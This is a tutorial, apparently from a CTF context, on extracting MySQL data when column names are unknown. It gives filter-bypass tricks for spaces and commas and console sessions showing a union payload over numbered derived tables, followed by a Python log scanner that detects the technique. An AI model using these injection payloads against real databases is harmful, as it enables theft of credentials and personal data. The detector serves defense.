How to cleverly bypass unknown field names in MySQL
Implementation
Problem: spaces and commas are filtered. `%0a`, `%0b`, `%0c`, `%0d`, `%a0`, or parentheses can be used directly in place of spaces, and the comma filter can be bypassed with `join`.
The name of the column that stores the flag is unknown, and information_schema.columns is filtered along with the hex-encoded table name, so the column name cannot be read out. In this case a union query can be used as follows.
The idea is to make the flag appear under a column name that is known: `select *` over derived tables named `(select 1) a, (select 2) b, ...` yields columns named 1, 2, 3, 4, and a union takes its column names from its first select, so the unknown column can then be referenced as `e.4`.
Sample Code:
mysql> select (select 1) a, (select 2) b, (select 3) c, (select 4) d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id = 1 union select (select e.4 from (select * from (select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e limit 1 offset 3) f, (select 1) g, (select 1) h, (select 1) i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
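From the defender's side, a filter that only looks for literal spaces and commas misses every step above. The following is an added example, not code from the original post: it scans constructed general-log style lines for the post's own signatures (a numbered placeholder table on the left of a UNION, placeholder columns chained with `,` or `join`, an `alias.<integer>` column reference) and for the whitespace substitutes the post lists, normalizing them before matching. The log line format, the sample lines and the signature names are assumptions.

```python
import re

# Whitespace substitutes the post lists as space-filter bypasses (%0a %0b %0c %0d %a0),
# plus ordinary space and tab, all collapsed to one space before matching.
WS_RUN = re.compile(r"[ \t\n\x0b\x0c\r\xa0]+")
ODD_WS = re.compile(r"[\x0b\x0c\xa0]")           # separators no hand-typed query uses
STRING_LIT = re.compile(r"'(?:[^'\\]|\\.)*'")    # blanked out before signature matching

# Signatures of the trick shown above: a numbered placeholder table as the left side of a
# UNION (so the UNION inherits its column names), placeholder columns chained with "," or
# JOIN, and a reference to a column whose name is a bare integer (the e.4 in the post).
SIGNATURES = {
    "placeholder_table_union": re.compile(
        r"\(\s*select\s+\d+\s*\)\s*\w+\s+union\s+(?:all\s+)?select\b", re.I),
    "numbered_placeholder_cols": re.compile(
        r"\(\s*select\s+\d+\s*\)\s*\w+\s*(?:,|\bjoin\b)\s*\(\s*select\s+\d+\s*\)", re.I),
    "integer_column_reference": re.compile(r"\b[a-z_]\w*\.\d+\b", re.I),
}

def normalize(query: str) -> str:
    """Collapse every whitespace variant to one space and blank out string literals."""
    return STRING_LIT.sub("''", WS_RUN.sub(" ", query)).strip()

def classify(query: str) -> list[str]:
    """Names of the signatures the query triggers; an empty list means nothing seen."""
    hits = ["unusual_whitespace"] if ODD_WS.search(query) else []  # check the raw text first
    q = normalize(query)
    return hits + [name for name, pat in SIGNATURES.items() if pat.search(q)]

# Constructed general-log style lines (not real traffic): one benign lookup, then the
# post's final payload with every space replaced by %0b (vertical tab).
PAYLOAD = ("select * from user where id = 1 union select (select e.4 from (select * from "
           "(select 1) a, (select 2) b, (select 3) c, (select 4) d union select * from user) e "
           "limit 1 offset 3) f, (select 1) g, (select 1) h, (select 1) i").replace(" ", "\x0b")
SAMPLE_LOG = [
    "2024-01-01T10:00:00.000000Z\t   7 Query\tselect * from user where id = 1",
    "2024-01-01T10:00:01.000000Z\t   7 Query\t" + PAYLOAD,
]
LOG_LINE = re.compile(r"^\S+\t\s*(\d+) Query\t(.*)$")

def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(connection id, triggered signatures) for every Query line that triggers any."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (hits := classify(m.group(2))):
            findings.append((int(m.group(1)), hits))
    return findings
```

`scan_log(SAMPLE_LOG)` flags only the second line, with all four signatures; the first, benign lookup yields nothing.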